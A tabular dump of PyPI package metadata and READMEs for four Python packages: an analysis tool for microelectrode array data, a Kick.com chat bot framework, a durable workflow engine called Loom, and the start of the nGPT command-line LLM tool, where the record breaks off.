metadata_version string | name string | version string | summary string | description string | description_content_type string | author string | author_email string | maintainer string | maintainer_email string | license string | keywords string | classifiers list | platform list | home_page string | download_url string | requires_python string | requires list | provides list | obsoletes list | requires_dist list | provides_dist list | obsoletes_dist list | requires_external list | project_urls list | uploaded_via string | upload_time timestamp[us] | filename string | size int64 | path string | python_version string | packagetype string | comment_text string | has_signature bool | md5_digest string | sha256_digest string | blake2_256_digest string | license_expression string | license_files list | recent_7d_downloads int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2.4 | MEAlytics | 0.1.0 | Python tool for processing MEA files. | #### Please note that this project is still in development.
# MEAlytics
MEAlytics is an open-source Python tool for processing Microelectrode Array (MEA) data.<br>
This repository is maintained by the Amsterdam University of Applied Sciences (AUAS).<br>
## [For more information on functionality and usage, please refer to the documentation](https://cureq.github.io/MEAlytics/)
## CureQ
This tool was created for the CureQ consortium.<br>
For more information about the CureQ project, visit https://cureq.nl/.
___
## Install the library
MEAlytics can be installed from the Python Package Index (PyPI) using pip:
```shell
pip install MEAlytics
```
More elaborate installation instructions, including a 'plug-and-play' installer, can be found in the [User Guide](https://cureq.github.io/MEAlytics/installation).<br>
---
## Library usage
MEAlytics' functions can be called from a regular Python script, which is useful for automating the processing of large datasets. <br>
```python
from MEAlytics.mea import analyse_wells, get_default_parameters

fileadress = '/path/to/your/experiment.h5'
sampling_rate = 20000
electrode_amount = 12

# Get and edit parameters
parameters = get_default_parameters()
parameters['use multiprocessing'] = True

if __name__ == '__main__':
    analyse_wells(fileadress=fileadress,
                  sampling_rate=sampling_rate,
                  electrode_amnt=electrode_amount,
                  parameters=parameters
                  )
```
---
## MEA GUI
However, the main way MEAlytics is meant to be used is through the Graphical User Interface (GUI). <br>
The GUI can be used to initialize the analysis, but also contains other features such as interactive data visualization and plotting. <br>
### Opening the GUI
There are multiple ways to launch the GUI:
#### Opening from Python script
```python
from MEAlytics.GUI.mea_analysis_tool import MEA_GUI
if __name__ == "__main__":
    MEA_GUI()
```
#### Launching from command prompt
```shell
C:\Users>mealytics
```
or
```shell
C:\Users>python -m MEAlytics
```
#### Create shortcuts
This process can be simplified by creating shortcuts that in essence perform the same process. In the command prompt, enter `mealytics --create-shortcut`.
```shell
C:\Users>MEAlytics --create-shortcut
Desktop shortcut created at C:\Users\Desktop\MEAlytics.lnk
```
The output should look like this, and a shortcut should appear on your desktop and start menu.
#### From the installer
When you have installed MEAlytics using the Windows installer, you can open it like any other application, from the desktop or start menu.
---
## MEAlytics functionality
This section showcases the basic functionality of MEAlytics; for more information, refer to [the documentation](https://cureq.github.io/MEAlytics/).
### Multiprocessing
MEAlytics optionally utilizes **multiprocessing** to significantly speed up the analysis when resources are available!

### Spike detection
After performing the analysis, the user can inspect the results using the GUI!<br>
The user can alter all parameters regarding spike, burst and network burst detection and immediately apply these changes to see how they alter the analysis. This allows the user to quickly see the effect of parameter changes without having to redo the entire analysis. <br>

Additionally, the user can zoom in on the data to view smaller timeframes.

### Single channel burst detection
Burst detection is performed using the logISI method, meaning that the thresholds adapt to the input data!
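The general idea behind logISI-style thresholding can be sketched as follows (an illustrative simplification, not MEAlytics' actual implementation; the histogram binning and one-decade peak separation are assumptions): build a histogram of log-scaled inter-spike intervals, find the intra-burst and inter-burst peaks, and place the burst threshold at the valley between them, so it adapts to each recording.

```python
import numpy as np

def logisi_threshold(spike_times):
    """Illustrative logISI-style adaptive ISI threshold (seconds)."""
    isi = np.diff(np.sort(np.asarray(spike_times, dtype=float)))
    log_isi = np.log10(isi[isi > 0])
    hist, edges = np.histogram(log_isi, bins=100)
    centers = (edges[:-1] + edges[1:]) / 2
    # Main peak: typically the short intra-burst ISIs
    p1 = int(np.argmax(hist))
    # Second peak at least one decade away: inter-burst ISIs (assumed gap)
    far = np.abs(centers - centers[p1]) >= 1.0
    if not far.any():
        return None  # unimodal histogram: no adaptive threshold found
    p2 = int(np.flatnonzero(far)[np.argmax(hist[far])])
    lo, hi = sorted((p1, p2))
    # Threshold at the valley between the two peaks
    valley = lo + int(np.argmin(hist[lo:hi + 1]))
    return 10 ** centers[valley]

# Synthetic bursty train: 20 bursts of 10 spikes (5 ms ISIs, ~1 s gaps)
bursts = [b * 1.0 + np.arange(10) * 0.005 for b in range(20)]
print(logisi_threshold(np.concatenate(bursts)))
```

With this synthetic input, the returned threshold falls between the intra-burst (0.005 s) and inter-burst (~1 s) interval scales.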

### Network burst detection
Network burst detection is performed by looking for high activity bursting periods on multiple channels.
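As a toy illustration of that idea (a sketch only; the channel count, binning, and threshold below are assumptions, not MEAlytics' algorithm), one can count how many channels are bursting in each time bin and flag the bins where that count reaches a minimum:

```python
import numpy as np

def network_burst_mask(channel_bursting, min_channels=3):
    # channel_bursting: boolean array of shape (channels, time_bins),
    # True where that channel is inside a single-channel burst
    active_channels = channel_bursting.sum(axis=0)
    return active_channels >= min_channels

# 4 channels, 6 time bins: channels 0-2 burst together in bins 2-3
mask = np.zeros((4, 6), dtype=bool)
mask[:3, 2:4] = True
print(network_burst_mask(mask))
```

Only the bins where at least `min_channels` channels burst simultaneously are marked as part of a network burst.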

### Batch processing
Perform high-throughput analysis using the batch processing module!

### Features
MEAlytics calculates over 40 descriptive well and electrode features and saves them in a CSV file. These can then be read by other applications such as Excel.
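Because the output is plain CSV, the feature files can also be loaded programmatically, for example with pandas (the column names below are hypothetical stand-ins; the actual feature names in MEAlytics' output will differ):

```python
import io
import pandas as pd

# Stand-in for a MEAlytics feature file (hypothetical columns)
csv_text = """Well,Mean Firing Rate,Burst Rate
A1,2.4,0.31
A2,1.9,0.27
"""

features = pd.read_csv(io.StringIO(csv_text))
print(features["Mean Firing Rate"].mean())
```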

### Group comparison
The resulting features of multiple experiments can be combined to compare the differences between two groups using the plotting module.

Compare two groups with each other and create visualisations for all features. Output is saved in PDF format.

Visualise the development of features over time by simply adding a prefix to your feature files.

### Parameters
Lastly, MEAlytics offers a wide range of parameters that can be used to alter the analysis! However, all parameters have default values that are backed by literature.

<!--
**CureQ/CureQ** is a ✨ _special_ ✨ repository because its `README.md` (this file) appears on your GitHub profile.
-->
| text/markdown | null | CureQ <cureq-ft@hva.nl> | null | null | GPL-3.0-or-later | MEA, Microelectrode Array, electrophysiology, neuroscience, analysis | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"matplotlib>=3.7.3",
"numpy>=1.26.4",
"h5py>=3.9.0",
"pandas>=2.1.4",
"scipy>=1.11.4",
"seaborn>=0.12.2",
"statsmodels>=0.14.0",
"scikit-image>=0.22.0",
"KDEpy>=1.1.9",
"customtkinter>=5.2.2",
"CTkToolTip>=0.8",
"CTkMessagebox>=2.7",
"CTkColorPicker>=0.9.0",
"requests>=2.32.3",
"pyshortcuts>=1.9.5"
] | [] | [] | [] | [
"Homepage, https://github.com/CureQ/MEAlytics",
"Repository, https://github.com/CureQ/MEAlytics.git"
] | uv/0.8.14 | 2026-02-20T09:39:39.712656 | mealytics-0.1.0.tar.gz | 118,961 | 9f/81/4c553ea91f3c40b23823425ac6acb3aa5e6a29a87541f95841350ce1f219/mealytics-0.1.0.tar.gz | source | sdist | null | false | 0dc6fde69f552fa2cde49aa127b6984c | 3b8eb3981fc8d33e1836aa07ccad7d182a8ebccc534cbf7f0616d492d6b34eaa | 9f814c553ea91f3c40b23823425ac6acb3aa5e6a29a87541f95841350ce1f219 | null | [
"LICENSE"
] | 0 |
2.4 | KickZero | 1.3.0.0 | An advanced, easy-to-use bot framework for Kick.com | # ⚔️ KickZero Framework
A modern, high-performance, asynchronous, **Context**-based bot framework built for the Kick.com platform.
## ✨ Key Features
* 🚀 **Fully Asynchronous:** Runs without blocking, powered by its `aiohttp`- and `websockets`-based engine.
* 🧠 **Context Structure:** Speeds up coding with conveniences such as `ctx.reply()` and `ctx.author`.
* 🔍 **Advanced Debugging:** Reports message-sending errors down to the line number in the file.
* 🛡️ **Spam Protection:** Prevents the bot from replying to its own messages and entering an infinite loop.
## 🛠️ Installation
Clone the project to your machine:
```bash
git clone https://github.com/KULLANICI_ADIN/KickZero.git
cd KickZero
pip install -r requirements.txt
```
## 📖 Example Usage
```python
import asyncio
from KickZero import KickBot

# Start the bot
bot = KickBot(
    user_name="YourBotName",
    app_key="KICK_APP_KEY",
    chat_id="CHAT_ID",
    bearer_token="BEARER_TOKEN"
)

@bot.command(name="ping")
async def ping_komutu(ctx, args):
    await ctx.reply("Pong! Zoro is on async watch! ⚔️")

@bot.on_message()
async def mesaj_takibi(ctx):
    # Print every incoming message to the console
    print(f"💬 [{ctx.author}]: {ctx.content}")

if __name__ == "__main__":
    asyncio.run(bot.start())
```
## 🤝 Contributing
This project is open to development, but if you want to make major changes or add new features, please open an **Issue** first or get in touch with me. Large changes made without prior approval are not guaranteed to be merged into the main project.
| text/markdown | Seymen Sözen | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/SeymenSozen/KickZero | null | >=3.8 | [] | [] | [] | [
"aiohttp",
"websockets",
"colorama"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:39:33.591500 | kickzero-1.3.0.0.tar.gz | 13,958 | 0a/45/df1b64dd820625304c4e49ef2e3ab03e30b926be94dd013ace16999cd762/kickzero-1.3.0.0.tar.gz | source | sdist | null | false | b2b5c2b622afef94de31f967e62c5ca0 | b4bebb70c68501c02e06e5efc2650d994e6d468092701f4eb4ba460492755862 | 0a45df1b64dd820625304c4e49ef2e3ab03e30b926be94dd013ace16999cd762 | null | [
"LICENSE"
] | 0 |
2.4 | loom-core | 1.22.0 | Durable workflow orchestration engine for Python | # Loom - Durable Workflow Orchestration
<p align="center">
<img src="https://raw.githubusercontent.com/satadeep3927/loom/refs/heads/main/docs/logo-white.png" alt="Loom Logo" width="200"/>
</p>
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pypi.org/project/loom-core/)
A Python-based durable workflow orchestration engine inspired by [Temporal](https://temporal.io/) and [Durable Task Framework](https://github.com/Azure/durabletask). Loom provides event-sourced, deterministic workflow execution with automatic recovery and replay capabilities.
## Features
- **Event Sourcing**: All workflow state changes persisted as immutable events
- **Deterministic Replay**: Workflows reconstruct from event history for recovery
- **Type Safe**: Full generic typing support with `Workflow[InputT, StateT]`
- **Async First**: Built on asyncio for high-performance concurrent execution
- **Durable Execution**: Workflows survive process crashes and auto-recover
- **Beautiful CLI**: Rich console interface with progress tracking
- **Well Tested**: Comprehensive test suite with pytest
## Quick Start
### Installation
```bash
pip install loom-core
```
Or install from source:
```bash
git clone https://github.com/satadeep3927/loom.git
cd loom
pip install -e .
```
### Define a Workflow
```python
import asyncio
from typing import TypedDict

import loom

# Define your data types
class OrderInput(TypedDict):
    order_id: str
    customer_email: str

class OrderState(TypedDict):
    payment_confirmed: bool
    email_sent: bool

# Define activities (side effects)
@loom.activity(name="process_payment", retry_count=3, timeout_seconds=30)
async def process_payment(order_id: str) -> bool:
    # Call payment API
    return True

@loom.activity(name="send_email", retry_count=2)
async def send_confirmation_email(email: str, order_id: str) -> None:
    # Send email via service
    pass

# Define workflow
@loom.workflow(name="OrderProcessing", version="1.0.0")
class OrderWorkflow(loom.Workflow[OrderInput, OrderState]):
    @loom.step(name="process_payment")
    async def payment_step(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
        success = await ctx.activity(process_payment, ctx.input["order_id"])
        await ctx.state.set("payment_confirmed", success)
        ctx.logger.info(f"Payment processed: {success}")

    @loom.step(name="send_confirmation")
    async def notification_step(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
        if ctx.state["payment_confirmed"]:
            await ctx.activity(
                send_confirmation_email,
                ctx.input["customer_email"],
                ctx.input["order_id"]
            )
            await ctx.state.set("email_sent", True)
            ctx.logger.info("Confirmation email sent")
```
### Start a Workflow
The simplest way to start a workflow is using the class method:
```python
import asyncio

import loom

async def main():
    # Start workflow using the class method (recommended)
    handle = await OrderWorkflow.start(
        OrderInput(
            order_id="ORD-12345",
            customer_email="customer@example.com",
        )
    )
    print(f"Workflow started: {handle.workflow_id}")

    # Wait for completion and get result (final state)
    result = await handle.result()
    print(f"Workflow completed with state: {result}")

if __name__ == "__main__":
    asyncio.run(main())
```
### Run the Worker
```bash
# Initialize database
loom init
# Start worker with 4 concurrent task processors
loom worker
# Custom configuration
loom worker --workers 8 --poll-interval 1.0
```
### 🌐 Web Dashboard
Start the interactive web dashboard to monitor and manage workflows in real-time:
```bash
# Start web server on default port (8000)
loom web
# Custom host and port
loom web --host 0.0.0.0 --port 3000
# Development mode with auto-reload
loom web --reload
```
**Access the dashboard at `http://localhost:8000`** after starting the server.
The web dashboard provides:
- 📊 **Real-time workflow monitoring** with Server-Sent Events (SSE)
- 📈 **Workflow definition graphs** (similar to Airflow DAGs) showing workflow structure
- 📋 **Task queue visualization** and execution tracking
- 📜 **Event history** with comprehensive audit trails
- 📊 **Performance metrics** and system statistics
- 📚 **Interactive API documentation** at `/docs`
## 🎯 Complete Example
Here's a complete workflow example demonstrating all features:
```python
import random
from datetime import timedelta

import loom
from loom.core.context import WorkflowContext
from loom.core.workflow import Workflow
from loom.schemas.state import Input, State

class QuizInput(Input):
    lesson_id: str

class QuizState(State):
    quiz_id: str | None
    wait_time: int | None
    submissions: list | None
    result: dict | None

@loom.activity(name="GenerateQuiz")
async def generate_quiz_activity() -> str:
    quiz_id = f"Quiz-{random.randint(1000, 9999)}"
    print(f"Generated Quiz: {quiz_id}")
    return quiz_id

@loom.activity(name="SendQuizToLMS")
async def send_quiz_to_lms_activity(quiz_id: str) -> None:
    print(f"Sent {quiz_id} to LMS")

@loom.activity(name="FetchWaitTime")
async def fetch_wait_time_activity() -> int:
    return 120  # 2 minutes

@loom.activity(name="PullSubmissions")
async def pull_submissions_activity(quiz_id: str) -> list:
    print(f"Pulled submissions for {quiz_id}")
    return ["Submission 1", "Submission 2", "Submission 3"]

@loom.activity(name="AssessResult")
async def assess_result_activity(quiz_id: str) -> dict:
    score = random.randint(50, 100)
    return {"quiz_id": quiz_id, "score": score, "status": "Completed"}

@loom.activity(name="StoreResult")
async def store_result_activity(result: dict) -> None:
    print(f"Stored Result: {result}")

@loom.workflow(
    name="AssessmentWorkflow",
    version="1.0.0",
    description="A workflow for Quiz management."
)
class AssessmentWorkflow(Workflow[QuizInput, QuizState]):
    @loom.step(name="generate_quiz")
    async def generate_quiz(self, ctx: WorkflowContext[QuizInput, QuizState]):
        ctx.logger.info("Generating Quiz...")
        quiz_id = await ctx.activity(generate_quiz_activity)
        await ctx.state.set("quiz_id", quiz_id)

    @loom.step(name="send_to_lms")
    async def send_to_lms(self, ctx: WorkflowContext[QuizInput, QuizState]):
        quiz_id = ctx.state.get("quiz_id")
        ctx.logger.info(f"Sending Quiz {quiz_id} to LMS...")
        await ctx.activity(send_quiz_to_lms_activity, quiz_id)

    @loom.step(name="fetch_wait_time")
    async def fetch_wait_time(self, ctx: WorkflowContext[QuizInput, QuizState]):
        ctx.logger.info("Fetching wait time...")
        wait_time = await ctx.activity(fetch_wait_time_activity)
        await ctx.state.set("wait_time", wait_time)

    @loom.step(name="wait_step")
    async def wait_step(self, ctx: WorkflowContext[QuizInput, QuizState]):
        wait_time = ctx.state.get("wait_time")
        ctx.logger.info(f"Waiting for {wait_time} seconds...")
        await ctx.sleep(delta=timedelta(seconds=wait_time))

    @loom.step(name="pull_submissions")
    async def pull_submissions(self, ctx: WorkflowContext[QuizInput, QuizState]):
        quiz_id = ctx.state.get("quiz_id")
        submissions = await ctx.activity(pull_submissions_activity, quiz_id)
        await ctx.state.set("submissions", submissions)

    @loom.step(name="assess_result")
    async def assess_result(self, ctx: WorkflowContext[QuizInput, QuizState]):
        quiz_id = ctx.state.get("quiz_id")
        result = await ctx.activity(assess_result_activity, quiz_id)
        await ctx.state.set("result", result)

    @loom.step(name="store_result")
    async def store_result(self, ctx: WorkflowContext[QuizInput, QuizState]):
        result = ctx.state.get("result")
        await ctx.activity(store_result_activity, result)
        ctx.logger.info("Workflow completed!")

# Start the workflow
async def main():
    handle = await AssessmentWorkflow.start({"lesson_id": "lesson_123"})
    result = await handle.status()
    print(f"Workflow Status: {result}")

if __name__ == "__main__":
    import asyncio
    asyncio.run(main())
```
This example demonstrates:
- **Multiple steps** with sequential execution
- **Activity calls** for side effects
- **State management** across workflow execution
- **Timer/sleep** operations for waiting
- **Logging** with workflow context
- **Type safety** with generic workflow types
## 📚 Core Concepts
### State Management
Loom provides three ways to manage workflow state, all of which are durable and replay-safe:
#### 1. Single Key Updates (`set`)
Use `ctx.state.set()` for individual state changes. Each call emits a `STATE_SET` event:
```python
@loom.step()
async def process_order(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
    # Set individual keys
    await ctx.state.set("order_id", "ORD-123")
    await ctx.state.set("status", "processing")
    await ctx.state.set("timestamp", "2024-01-15T10:30:00")

    # Read state
    order_id = ctx.state["order_id"]    # Dictionary access
    status = ctx.state.get("status")    # Safe get
    items = ctx.state.get("items", [])  # With default
```
#### 2. Batch Updates (`update`)
Use `ctx.state.update()` to replace the entire state atomically. Emits a single `STATE_UPDATE` event:
```python
@loom.step()
async def update_order_state(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
    # Update entire state with a function that receives current state
    await ctx.state.update(lambda state: {
        **state,  # Preserve existing keys
        "order_id": "ORD-123",
        "status": "shipped",
        "shipped_at": "2024-01-15T14:00:00"
    })
```
**Important**: The update function receives the current state and must return the complete new state.
#### 3. Batch Context Manager (`batch`)
Use `async with ctx.state.batch()` to collect multiple `set()` calls into a single `STATE_UPDATE` event:
```python
@loom.step()
async def batch_update(self, ctx: loom.WorkflowContext[OrderInput, OrderState]):
    # Multiple updates batched into single STATE_UPDATE event
    async with ctx.state.batch():
        await ctx.state.set("order_id", "ORD-123")
        await ctx.state.set("status", "processing")
        await ctx.state.set("items", ["item1", "item2"])
        await ctx.state.set("total", 99.99)
    # Single STATE_UPDATE event emitted when context exits
```
**When to use each**:
- `set()`: Simple, single updates
- `update()`: Replace entire state based on current values
- `batch()`: Multiple related updates that should be atomic
### Workflow Handles
Workflow handles provide control and monitoring of running workflows:
```python
# Start workflow and get handle
handle = await OrderWorkflow.start({"order_id": "ORD-123"})
# Get workflow ID
print(f"Workflow ID: {handle.workflow_id}")
# Check status (returns "RUNNING", "COMPLETED", "FAILED", etc.)
status = await handle.status()
print(f"Status: {status}")
# Wait for completion and get final state
try:
    result = await handle.result()
    print(f"Completed with state: {result}")
except loom.WorkflowExecutionError as e:
    print(f"Workflow failed: {e}")
except loom.ActivityFailedError as e:
    print(f"Activity '{e.activity_name}' failed: {e.error_message}")
# Send signals to running workflow
await handle.signal("approve", {"approved_by": "admin", "timestamp": "2024-01-15"})
# Cancel workflow
await handle.cancel(reason="User requested cancellation")
```
### Exception Handling
⚠️ **CRITICAL**: Never catch `StopReplay` in your workflow code!
`StopReplay` is an internal control flow exception used by Loom to pause workflow replay when waiting for activities, timers, or signals. Catching it will break workflow execution and recovery.
```python
# ❌ WRONG - This will break workflow execution!
@loom.step()
async def bad_step(self, ctx):
    try:
        await ctx.activity(my_activity)
    except Exception:  # This catches StopReplay!
        ctx.logger.error("Error occurred")  # Workflow breaks here
        pass

# ❌ ALSO WRONG
@loom.step()
async def another_bad_step(self, ctx):
    try:
        await ctx.activity(my_activity)
    except:  # Never use bare except
        pass

# ✅ CORRECT - Catch specific exceptions only
@loom.step()
async def good_step(self, ctx):
    try:
        result = await ctx.activity(my_activity)
        await ctx.state.set("result", result)
    except loom.ActivityFailedError as e:
        # Handle activity failure
        ctx.logger.error(f"Activity failed: {e}")
        await ctx.state.set("error", str(e))
        # Workflow can continue or raise to fail
```
**Available Exceptions**:
Use these in your application code (not inside workflow steps):
```python
import loom
# Workflow execution
try:
    handle = await MyWorkflow.start(input_data, state)
    result = await handle.result()
except loom.WorkflowNotFoundError:
    print("Workflow doesn't exist")
except loom.WorkflowStillRunningError:
    print("Workflow hasn't completed yet")
except loom.WorkflowExecutionError:
    print("Workflow failed during execution")
except loom.ActivityFailedError as e:
    print(f"Activity '{e.activity_name}' failed: {e.error_message}")
except loom.NonDeterministicWorkflowError:
    print("Workflow code changed in incompatible way")
```
**Why is StopReplay special?**
`StopReplay` is raised internally when the workflow execution reaches a point where it needs to wait for external events:
- An activity that hasn't completed yet
- A timer that hasn't fired
- A signal that hasn't been received
The engine catches this exception to save progress and pause execution. If your code catches it, the engine never receives it, and the workflow cannot properly pause and resume.
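The pattern is easy to see in isolation. The sketch below (a simplified illustration with assumed names, not Loom's actual engine code) shows an engine-side loop using a control-flow exception to suspend a workflow; if a user's step swallowed the exception first, the engine could never pause and resume it:

```python
import asyncio

class StopReplay(Exception):
    """Control-flow exception: the workflow must wait for an external event."""

async def step_that_blocks():
    raise StopReplay()  # e.g. an activity result is not yet available

async def run_step(step):
    # Engine-side: catch the control-flow exception to suspend, not fail
    try:
        await step()
        return "completed"
    except StopReplay:
        return "suspended"  # persist progress; resume when the event arrives

print(asyncio.run(run_step(step_that_blocks)))  # suspended
```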
### Best Practices
#### ✅ Do:
- **Use activities for side effects**: All API calls, database writes, file I/O, etc.
```python
@loom.activity(name="send_email", retry_count=3)
async def send_email(to: str, subject: str) -> bool:
    # API call, retry on failure
    await email_service.send(to, subject)
    return True
```
- **Make activities idempotent**: Safe to retry multiple times
```python
@loom.activity(name="create_order")
async def create_order(order_id: str) -> dict:
    # Check if order exists first (idempotent)
    existing = await db.get_order(order_id)
    if existing:
        return existing
    return await db.create_order(order_id)
```
- **Use batch for related updates**: More efficient, single event
```python
async with ctx.state.batch():
    await ctx.state.set("step", 3)
    await ctx.state.set("progress", 75)
    await ctx.state.set("updated_at", timestamp)
```
- **Use type hints**: Better IDE support and type checking
```python
class MyWorkflow(loom.Workflow[MyInput, MyState]):
    @loom.step()
    async def my_step(self, ctx: loom.WorkflowContext[MyInput, MyState]):
        # ctx.input is MyInput, ctx.state is MyState
        pass
```
- **Log with ctx.logger**: Respects replay mode, won't duplicate logs
```python
ctx.logger.info("Processing order") # Only logs during actual execution
ctx.logger.error("Failed to process") # Not during replay
```
- **Catch specific exceptions**: Only catch what you can handle
```python
try:
    await ctx.activity(risky_activity)
except loom.ActivityFailedError:
    # Handle specific failure
    pass
```
#### ❌ Don't:
- **Don't use random in workflows**: Breaks determinism
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
    value = random.randint(1, 100)  # Different on replay!
    await ctx.state.set("value", value)

# ✅ CORRECT - Use activity
@loom.activity(name="generate_random")
async def generate_random() -> int:
    return random.randint(1, 100)

@loom.step()
async def good_step(self, ctx):
    value = await ctx.activity(generate_random)
    await ctx.state.set("value", value)
```
- **Don't use datetime.now() in workflows**: Non-deterministic
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
    now = datetime.now()  # Different on replay!

# ✅ CORRECT - Use activity
@loom.activity(name="get_timestamp")
async def get_timestamp() -> str:
    return datetime.now().isoformat()
```
- **Don't perform I/O in workflows**: Use activities instead
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
    data = await http_client.get("https://api.example.com")  # Don't!

# ✅ CORRECT
@loom.activity(name="fetch_data")
async def fetch_data() -> dict:
    return await http_client.get("https://api.example.com")
```
- **Don't catch Exception or bare except**: Catches StopReplay
```python
# ❌ WRONG
try:
    await ctx.activity(my_activity)
except Exception:  # Catches everything including StopReplay!
    pass

# ✅ CORRECT
try:
    await ctx.activity(my_activity)
except loom.ActivityFailedError:  # Specific exception only
    pass
```
- **Don't modify state without ctx.state**: Won't be persisted
```python
# ❌ WRONG
@loom.step()
async def bad_step(self, ctx):
    my_state = {"value": 123}
    # State not persisted!

# ✅ CORRECT
@loom.step()
async def good_step(self, ctx):
    await ctx.state.set("value", 123)  # Persisted
```
## CLI Commands
```bash
# Initialize database
loom init
# Start distributed worker
loom worker [--workers 4] [--poll-interval 0.5]
# List workflows
loom list [--limit 50] [--status RUNNING]
# Inspect workflow details
loom inspect <workflow-id> [--events]
# Show database statistics
loom stats
```
## 🏗️ Architecture
### Core Components

### Event Types
- `WORKFLOW_STARTED` - Workflow initialization
- `WORKFLOW_COMPLETED` - Successful completion
- `WORKFLOW_FAILED` - Fatal error occurred
- `STATE_SET` - Single state key updated
- `STATE_UPDATE` - Batch state update
- `ACTIVITY_SCHEDULED` - Activity queued for execution
- `ACTIVITY_COMPLETED` - Activity finished successfully
- `ACTIVITY_FAILED` - Activity permanently failed
- `TIMER_FIRED` - Sleep/delay completed
- `SIGNAL_RECEIVED` - External signal received
## Project Structure
```
loom/
├── src/
│   ├── common/        # Shared utilities
│   ├── core/          # Core engine (context, engine, runner, worker)
│   ├── database/      # Database layer
│   ├── decorators/    # @workflow, @step, @activity
│   ├── lib/           # Utilities and progress tracking
│   ├── migrations/    # Database migrations
│   └── schemas/       # Type definitions
├── tests/             # Test suite
├── examples/          # Example workflows
├── loom.py            # Main package interface
└── pyproject.toml     # Package configuration
```
## Configuration
Loom uses SQLite by default for simplicity. For production:
- Consider PostgreSQL/MySQL for scalability
- Implement connection pooling
- Add monitoring and alerting
- Deploy multiple workers for high availability
## Contributing
Contributions welcome! Please ensure:
1. Tests pass: `pytest`
2. Code formatted: `black .`
3. Type checking: `mypy .`
4. Linting: `ruff check .`
## 📝 License
MIT License - see LICENSE file for details
## 🙏 Acknowledgments
Inspired by:
- [Temporal](https://temporal.io/) - The workflow orchestration platform
- [Durable Task Framework](https://github.com/Azure/durabletask) - Microsoft's durable task library
- [Cadence](https://cadenceworkflow.io/) - Uber's workflow platform
[GitHub](https://github.com/satadeep3927/loom/issues)
## 📧 Contact
For questions and support, please open an issue on GitHub.
---
**Built with ❤️ using Python 3.12+**
| text/markdown | Satadeep Dasgupta | Satadeep Dasgupta <satadeep.dasgupta@brainiuminfotech.com> | null | null | MIT | workflow, orchestration, durable, event-sourcing, temporal | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Framework :: AsyncIO"
] | [] | https://github.com/satadeep3927/loom | null | >=3.12 | [] | [] | [] | [
"aiosqlite>=0.19.0",
"duckdb>=1.0.0",
"click>=8.0.0",
"rich>=14.3.1",
"fastapi[standard]>=0.95.0",
"uvicorn[standard]>=0.22.0",
"pydantic>=2.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"isort>=5.12.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/satadeep3927/loom",
"Documentation, https://github.com/satadeep3927/loom/blob/main/README.md",
"Repository, https://github.com/satadeep3927/loom",
"Issues, https://github.com/satadeep3927/loom/issues"
] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:39:01.351504 | loom_core-1.22.0.tar.gz | 374,217 | 3f/69/e6a80279448b38384905e88fccdf1f2b259f3d7e7b6fe481dc4a5ec358d9/loom_core-1.22.0.tar.gz | source | sdist | null | false | 3a81472353c9e7ac81fa3cea46932ddb | 0ad26774cca614b9c2ed3b941d2f7cca30731a14dac9c02e84dd09b97adf4377 | 3f69e6a80279448b38384905e88fccdf1f2b259f3d7e7b6fe481dc4a5ec358d9 | null | [
"LICENSE"
] | 227 |
2.4 | ngpt | 6.8.0 | A lightning-fast AI-powered CLI toolkit for terminal productivity. Generate code, craft git commits, execute shell commands, and chat with any OpenAI-compatible LLM (OpenAI, Ollama, Groq, Claude, Gemini) directly from your terminal. | # nGPT
<p align="center">
<img src="https://raw.githubusercontent.com/nazdridoy/ngpt/main/.github/banner.svg" alt="nGPT Banner">
</p>
<p align="center">
<a href="https://pypi.org/project/ngpt/"><img src="https://img.shields.io/pypi/v/ngpt.svg" alt="PyPI version"></a>
<a href="https://aur.archlinux.org/packages/ngpt"><img alt="AUR Version" src="https://img.shields.io/aur/version/ngpt"></a>
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"></a>
<a href="https://nazdridoy.github.io/ngpt/"><img src="https://img.shields.io/badge/docs-available-brightgreen.svg" alt="Documentation"></a>
<a href="https://deepwiki.com/nazdridoy/ngpt"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki [DOCS]"></a>
</p>
<p align="center">
<a href="https://nazdridoy.github.io/ngpt/installation/#linuxmacos"><img src="https://img.shields.io/badge/Linux-support-blue?logo=linux" alt="Linux"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#windows"><img src="https://img.shields.io/badge/Windows-support-blue?logo=windows" alt="Windows"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#linuxmacos"><img src="https://img.shields.io/badge/macOS-support-blue?logo=apple" alt="macOS"></a>
<a href="https://nazdridoy.github.io/ngpt/installation/#android-termux"><img src="https://img.shields.io/badge/Android-Termux-blue?logo=android" alt="Android"></a>
</p>
🤖 **nGPT** - A lightning-fast CLI tool that brings any OpenAI-compatible LLM (OpenAI, Ollama, Groq, Claude, Gemini) directly to your terminal. Generate code, craft git commits, execute shell commands, rewrite text, and chat interactively, all with seamless provider switching and real-time streaming.

## Features
- ✅ **Versatile**: Powerful and easy-to-use CLI tool for various AI tasks
